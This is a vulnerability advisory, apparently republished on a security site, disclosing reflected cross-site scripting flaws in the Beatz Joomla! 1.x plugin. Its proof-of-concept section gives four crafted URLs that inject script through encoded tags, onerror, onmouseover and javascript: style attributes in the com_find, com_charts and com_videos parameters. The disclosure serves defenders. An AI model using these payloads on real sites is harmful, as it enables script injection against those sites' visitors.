Joomla! Plugin Beatz 1.x <= Multiple Cross Site Scripting Vulnerabilities

2012.04.16
Credit: Aung Khant
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

1. OVERVIEW Beatz 1.x versions are vulnerable to Cross Site Scripting. 2. BACKGROUND Beatz is a set of powerful Social Networking Script Joomla! 1.5 plugins that allows you to start your own favourite artist band website. Although it is just a Joomla! plugin, it comes with full Joolma! bundle for ease of use and installation. 3. VULNERABILITY DESCRIPTION Multiple parameters were not properly sanitized upon submission, which allows attacker to conduct Cross Site Scripting attack. This may allow an attacker to create a specially crafted URL that would execute arbitrary script code in a victim's browser. The vulnerable plugins include: com_find, com_charts and com_videos. 4. VERSIONS AFFECTED Tested in 1.x versions 5. PROOF-OF-CONCEPT/EXPLOIT == Generic Joomla! 1.5 Double Encoding XSS http://localhost/beatz/?option=com_content&view=frontpage&limitstart=5&%2522%253e%253c%2573%2563%2572%2569%2570%2574%253e%2561%256c%2565%2572%2574%2528%2f%2558%2553%2553%2f%2529%253c%2f%2573%2563%2572%2569%2570%2574%253e=1 == com_charts (parameter: do) http://localhost/beatz/index.php?option=com_charts&view=charts&Itemid=76&chartkeyword=Acoustic&do=all%22%20style%3dbackground-image:url('javascript:alert(/XSS/)');width:1000px;height:1000px;display:block;"%20x=%22&option=com_charts == com_find (parameter: keyword) http://localhost/beatz/index.php?do=listAll&keyword=++Search"><img+src=0+onerror=prompt(/XSS/)>&option=com_find == com_videos (parameter: video_keyword) http://localhost/beatz/index.php?option=com_videos&view=videos&Itemid=59&video_keyword="+style="width:1000px;height:1000px;position:absolute;left:0;top:0"+onmouseover="alert(/xss/)&search=Search 6. SOLUTION The vendor hasn't released the fixed yet. 7. VENDOR Cogzidel Technologies Pvt Ltd. http://www.cogzidel.com/ 8. CREDIT Aung Khant, http://yehg.net, YGN Ethical Hacker Group, Myanmar. 9. DISCLOSURE TIME-LINE 2011-03-01: notified vendor 2012-04-15: vulnerability disclosed 10. REFERENCES Original Advisory URL: http://yehg.net/lab/pr0js/advisories/%5Bbeatz_1.x%5D_xss #yehg [2012-04-15]

References:

http://www.cogzidel.com/


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top